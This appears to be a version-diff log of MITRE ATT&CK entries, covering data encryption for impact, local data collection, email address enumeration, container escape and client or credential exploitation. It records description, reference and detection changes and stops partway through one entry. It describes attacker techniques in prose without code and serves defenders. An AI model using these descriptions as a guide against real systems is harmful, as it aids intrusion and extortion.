x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesUser Account: User Account Authentication
x_mitre_data_sourcesFile: File Deletion
x_mitre_data_sourcesUser Account: User Account Metadata
x_mitre_platformsNetwork
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Deletion

[T1486] Data Encrypted for Impact

Current version: 1.4

Version changed from: 1.2 → 1.4


Old Description
New Description
t1Adversaries may encrypt data on target systems or on large nt1Adversaries may encrypt data on target systems or on large n
>umbers of systems in a network to interrupt availability to >umbers of systems in a network to interrupt availability to 
>system and network resources. They can attempt to render sto>system and network resources. They can attempt to render sto
>red data inaccessible by encrypting files or data on local a>red data inaccessible by encrypting files or data on local a
>nd remote drives and withholding access to a decryption key.>nd remote drives and withholding access to a decryption key.
> This may be done in order to extract monetary compensation > This may be done in order to extract monetary compensation 
>from a victim in exchange for decryption or a decryption key>from a victim in exchange for decryption or a decryption key
> (ransomware) or to render data permanently inaccessible in > (ransomware) or to render data permanently inaccessible in 
>cases where the key is not saved or transmitted.(Citation: U>cases where the key is not saved or transmitted.(Citation: U
>S-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Cit>S-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Cit
>ation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)>ation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
> In the case of ransomware, it is typical that common user f>  In the case of ransomware, it is typical that common user 
>iles like Office documents, PDFs, images, videos, audio, tex>files like Office documents, PDFs, images, videos, audio, te
>t, and source code files will be encrypted. In some cases, a>xt, and source code files will be encrypted (and often renam
>dversaries may encrypt critical system files, disk partition>ed and/or tagged with specific file markers)Adversaries ma
>s, and the MBR.(Citation: US-CERT NotPetya 2017)  To maximiz>y need to first employ other behaviors, such as [File and Di
>e impact on the target organization, malware designed for en>rectory Permissions Modification](https://attack.mitre.org/t
>crypting data may have worm-like features to propagate acros>echniques/T1222) or [System Shutdown/Reboot](https://attack.
>s a network by leveraging other attack techniques like [Vali>mitre.org/techniques/T1529), in order to unlock and/or gain 
>d Accounts](https://attack.mitre.org/techniques/T1078), [OS >access to manipulate these files.(Citation: CarbonBlack Cont
>Credential Dumping](https://attack.mitre.org/techniques/T100>i July 2020) In some cases, adversaries may encrypt critical
>3), and [SMB/Windows Admin Shares](https://attack.mitre.org/> system files, disk partitions, and the MBR.(Citation: US-CE
>techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Cita>RT NotPetya 2017)   To maximize impact on the target organiz
>tion: US-CERT NotPetya 2017)  In cloud environments, storage>ation, malware designed for encrypting data may have worm-li
> objects within compromised accounts may also be encrypted.(>ke features to propagate across a network by leveraging othe
>Citation: Rhino S3 Ransomware Part 1)>r attack techniques like [Valid Accounts](https://attack.mit
 >re.org/techniques/T1078), [OS Credential Dumping](https://at
 >tack.mitre.org/techniques/T1003), and [SMB/Windows Admin Sha
 >res](https://attack.mitre.org/techniques/T1021/002).(Citatio
 >n: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) E
 >ncryption malware may also leverage [Internal Defacement](ht
 >tps://attack.mitre.org/techniques/T1491/001), such as changi
 >ng victim wallpapers, or otherwise intimidate victims by sen
 >ding ransom notes or other messages to connected printers (k
 >nown as "print bombing").(Citation: NHS Digital Egregor Nov 
 >2020)  In cloud environments, storage objects within comprom
 >ised accounts may also be encrypted.(Citation: Rhino S3 Rans
 >omware Part 1)

New Detections:

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator', 'root', 'SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 21:07:27.119000+00:002022-06-16 13:07:10.318000+00:00
descriptionAdversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
external_references[1]['source_name']US-CERT Ransomware 2016CarbonBlack Conti July 2020
external_references[1]['description']US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.
external_references[1]['url']https://www.us-cert.gov/ncas/alerts/TA16-091Ahttps://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/
external_references[3]['source_name']US-CERT NotPetya 2017Rhino S3 Ransomware Part 1
external_references[3]['description']US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.
external_references[3]['url']https://www.us-cert.gov/ncas/alerts/TA17-181Ahttps://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/
external_references[4]['source_name']US-CERT SamSam 2018NHS Digital Egregor Nov 2020
external_references[4]['description']US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.
external_references[4]['url']https://www.us-cert.gov/ncas/alerts/AA18-337Ahttps://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary
external_references[5]['source_name']Rhino S3 Ransomware Part 1US-CERT Ransomware 2016
external_references[5]['description']Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.
external_references[5]['url']https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/https://www.us-cert.gov/ncas/alerts/TA16-091A
x_mitre_version1.21.4
x_mitre_data_sources[5]File: File CreationNetwork Share: Network Share Access
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'US-CERT NotPetya 2017', 'description': 'US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-181A'}
external_references{'source_name': 'US-CERT SamSam 2018', 'description': 'US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/AA18-337A'}
x_mitre_contributorsMayuresh Dani, Qualys
x_mitre_contributorsHarshal Tupsamudre, Qualys
x_mitre_contributorsTravis Smith, Qualys
x_mitre_contributorsExtraHop
x_mitre_data_sourcesNetwork Share: Network Share Access
x_mitre_data_sourcesFile: File Creation
x_mitre_data_sourcesCloud Storage: Cloud Storage Metadata
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCloud Storage: Cloud Storage Metadata

[T1005] Data from Local System

Current version: 1.5

Version changed from: 1.3 → 1.5


Old Description
New Description
t1Adversaries may search local system sources, such as file syt1Adversaries may search local system sources, such as file sy
>stems or local databases, to find files of interest and sens>stems and configuration files or local databases, to find fi
>itive data prior to Exfiltration.  Adversaries may do this u>les of interest and sensitive data prior to Exfiltration.  A
>sing a [Command and Scripting Interpreter](https://attack.mi>dversaries may do this using a [Command and Scripting Interp
>tre.org/techniques/T1059), such as [cmd](https://attack.mitr>reter](https://attack.mitre.org/techniques/T1059), such as [
>e.org/software/S0106), which has functionality to interact w>cmd](https://attack.mitre.org/software/S0106) as well as a [
>ith the file system to gather information. Some adversaries >Network Device CLI](https://attack.mitre.org/techniques/T105
>may also use [Automated Collection](https://attack.mitre.org>9/008), which have functionality to interact with the file s
>/techniques/T1119) on the local system. >ystem to gather information. Adversaries may also use [Autom
 >ated Collection](https://attack.mitre.org/techniques/T1119) 
 >on the local system. 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 22:16:42.734000+00:002022-10-19 21:55:54.866000+00:00
descriptionAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
x_mitre_data_sources[0]Script: Script ExecutionFile: File Access
x_mitre_data_sources[1]File: File AccessScript: Script Execution
x_mitre_detectionMonitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_version1.31.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Mandiant APT41 Global Intrusion ', 'description': 'Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.', 'url': 'https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits'}
external_references{'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'}
x_mitre_contributorsAustin Clark, @c2defense
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_platformsNetwork

[T1589.002] Gather Victim Identity Information: Email Addresses

Current version: 1.2

Version changed from: 1.0 → 1.2


Old Description
New Description
t1Adversaries may gather email addresses that can be used durit1Adversaries may gather email addresses that can be used duri
>ng targeting. Even if internal instances exist, organization>ng targeting. Even if internal instances exist, organization
>s may have public-facing email infrastructure and addresses >s may have public-facing email infrastructure and addresses 
>for employees.  Adversaries may easily gather email addresse>for employees.  Adversaries may easily gather email addresse
>s, since they may be readily available and exposed via onlin>s, since they may be readily available and exposed via onlin
>e or other accessible data sets (ex: [Social Media](https://>e or other accessible data sets (ex: [Social Media](https://
>attack.mitre.org/techniques/T1593/001) or [Search Victim-Own>attack.mitre.org/techniques/T1593/001) or [Search Victim-Own
>ed Websites](https://attack.mitre.org/techniques/T1594)).(Ci>ed Websites](https://attack.mitre.org/techniques/T1594)).(Ci
>tation: HackersArise Email)(Citation: CNET Leaks) Gathering >tation: HackersArise Email)(Citation: CNET Leaks) Email addr
>this information may reveal opportunities for other forms of>esses could also be enumerated via more active means (i.e. [
> reconnaissance (ex: [Search Open Websites/Domains](https://>Active Scanning](https://attack.mitre.org/techniques/T1595))
>attack.mitre.org/techniques/T1593) or [Phishing for Informat>, such as probing and analyzing responses from authenticatio
>ion](https://attack.mitre.org/techniques/T1598)), establishi>n services that may reveal valid usernames in a system.(Cita
>ng operational resources (ex: [Email Accounts](https://attac>tion: GrimBlog UsernameEnum) For example, adversaries may be
>k.mitre.org/techniques/T1586/002)), and/or initial access (e> able to enumerate email addresses in Office 365 environment
>x: [Phishing](https://attack.mitre.org/techniques/T1566)).>s by querying a variety of publicly available API endpoints,
 > such as autodiscover and GetCredentialType.(Citation: GitHu
 >b Office 365 User Enumeration)(Citation: Azure Active Direct
 >ory Reconnaisance)  Gathering this information may reveal op
 >portunities for other forms of reconnaissance (ex: [Search O
 >pen Websites/Domains](https://attack.mitre.org/techniques/T1
 >593) or [Phishing for Information](https://attack.mitre.org/
 >techniques/T1598)), establishing operational resources (ex: 
 >[Email Accounts](https://attack.mitre.org/techniques/T1586/0
 >02)), and/or initial access (ex: [Phishing](https://attack.m
 >itre.org/techniques/T1566) or [Brute Force](https://attack.m
 >itre.org/techniques/T1110) via [External Remote Services](ht
 >tps://attack.mitre.org/techniques/T1133)).

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)']
x_mitre_data_sources['Network Traffic: Network Traffic Content']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:27:19.702000+00:002022-10-21 14:30:10.979000+00:00
descriptionAdversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).
external_references[1]['source_name']HackersArise EmailAzure Active Directory Reconnaisance
external_references[1]['description']Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.
external_references[1]['url']https://www.hackers-arise.com/email-scraping-and-maltegohttps://o365blog.com/post/just-looking/
external_references[2]['source_name']CNET LeaksGitHub Office 365 User Enumeration
external_references[2]['description']Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.
external_references[2]['url']https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/https://github.com/gremwell/o365enum
x_mitre_detectionMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_version1.01.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GrimBlog UsernameEnum', 'description': 'GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.', 'url': 'https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/'}
external_references{'source_name': 'HackersArise Email', 'description': 'Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.', 'url': 'https://www.hackers-arise.com/email-scraping-and-maltego'}
external_references{'source_name': 'CNET Leaks', 'description': 'Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.', 'url': 'https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/'}

[T1611] Escape to Host

Current version: 1.3

Version changed from: 1.1 → 1.3


Old Description
New Description
t1Adversaries may break out of a container to gain access to tt1Adversaries may break out of a container to gain access to t
>he underlying host. This can allow an adversary access to ot>he underlying host. This can allow an adversary access to ot
>her containerized resources from the host level or to the ho>her containerized resources from the host level or to the ho
>st itself. In principle, containerized resources should prov>st itself. In principle, containerized resources should prov
>ide a clear separation of application functionality and be i>ide a clear separation of application functionality and be i
>solated from the host environment.(Citation: Docker Overview>solated from the host environment.(Citation: Docker Overview
>)  There are multiple ways an adversary may escape to a host>)  There are multiple ways an adversary may escape to a host
> environment. Examples include creating a container configur> environment. Examples include creating a container configur
>ed to mount the host’s filesystem using the bind parameter, >ed to mount the host’s filesystem using the bind parameter, 
>which allows the adversary to drop payloads and execute cont>which allows the adversary to drop payloads and execute cont
>rol utilities such as cron on the host, or utilizing a privi>rol utilities such as cron on the host; utilizing a privileg
>leged container to run commands on the underlying host.(Cita>ed container to run commands or load a malicious kernel modu
>tion: Docker Bind Mounts)(Citation: Trend Micro Privileged C>le on the underlying host; or abusing system calls such as `
>ontainer)(Citation: Intezer Doki July 20) Adversaries may al>unshare` and `keyctl` to escalate privileges and steal secre
>so escape via [Exploitation for Privilege Escalation](https:>ts.(Citation: Docker Bind Mounts)(Citation: Trend Micro Priv
>//attack.mitre.org/techniques/T1068), such as exploiting vul>ileged Container)(Citation: Intezer Doki July 20)(Citation: 
>nerabilities in global symbolic links in order to access the>Container Escape)(Citation: Crowdstrike Kubernetes Container
> root directory of a host machine.(Citation: Windows Server > Escape)(Citation: Keyctl-unmask)  Additionally, an adversar
>Containers Are Open)  Gaining access to the host may provide>y may be able to exploit a compromised container with a moun
> the adversary with the opportunity to achieve follow-on obj>ted container management socket, such as `docker.sock`, to b
>ectives, such as establishing persistence, moving laterally >reak out of the container via a [Container Administration Co
>within the environment, or setting up a command and control >mmand](https://attack.mitre.org/techniques/T1609).(Citation:
>channel on the host.> Container Escape) Adversaries may also escape via [Exploita
 >tion for Privilege Escalation](https://attack.mitre.org/tech
 >niques/T1068), such as exploiting vulnerabilities in global 
 >symbolic links in order to access the root directory of a ho
 >st machine.(Citation: Windows Server Containers Are Open)  G
 >aining access to the host may provide the adversary with the
 > opportunity to achieve follow-on objectives, such as establ
 >ishing persistence, moving laterally within the environment,
 > or setting up a command and control channel on the host.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:59:35.913000+00:002022-10-21 20:03:06.707000+00:00
descriptionAdversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.
external_references[1]['source_name']Docker OverviewContainer Escape
external_references[1]['description']Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.
external_references[1]['url']https://docs.docker.com/get-started/overview/https://0xn3va.gitbook.io/cheat-sheets/container/escaping
external_references[2]['source_name']Docker Bind MountsWindows Server Containers Are Open
external_references[2]['description']Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.
external_references[2]['url']https://docs.docker.com/storage/bind-mounts/https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/
external_references[3]['source_name']Trend Micro Privileged ContainerDocker Overview
external_references[3]['description']Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.
external_references[3]['url']https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.htmlhttps://docs.docker.com/get-started/overview/
external_references[4]['source_name']Intezer Doki July 20Docker Bind Mounts
external_references[4]['description']Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.
external_references[4]['url']https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/https://docs.docker.com/storage/bind-mounts/
external_references[5]['source_name']Windows Server Containers Are OpenTrend Micro Privileged Container
external_references[5]['description']Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.
external_references[5]['url']https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html
x_mitre_version1.11.3
x_mitre_data_sources[1]Process: OS API ExecutionVolume: Volume Modification
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Intezer Doki July 20', 'description': 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.', 'url': 'https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/'}
external_references{'source_name': 'Crowdstrike Kubernetes Container Escape', 'description': 'Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.', 'url': 'https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/'}
external_references{'source_name': 'Keyctl-unmask', 'description': 'Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.', 'url': 'https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/'}
x_mitre_contributorsCrowdStrike
x_mitre_contributorsEran Ayalon, Cybereason
x_mitre_contributorsOren Ofer, Cybereason
x_mitre_contributorsIlan Sokol, Cybereason
x_mitre_data_sourcesKernel: Kernel Module Load
x_mitre_data_sourcesProcess: OS API Execution

[T1203] Exploitation for Client Execution

Current version: 1.4

Version changed from: 1.2 → 1.4

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Application Log: Application Log Content', 'Process: Process Creation']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 19:01:34.932000+00:002022-04-18 18:48:06.141000+00:00
x_mitre_version1.21.4

[T1212] Exploitation for Credential Access

Current version: 1.4

Version changed from: 1.1 → 1.4

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_data_sources['Process: Process Creation', 'Application Log: Application Log Content', 'User Account: User Account Authentication']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 18:51:01.070000+00:002022-04-28 16:06:49.447000+00:00
external_references[1]['source_name']Technet MS14-068ADSecurity Detecting Forged Tickets
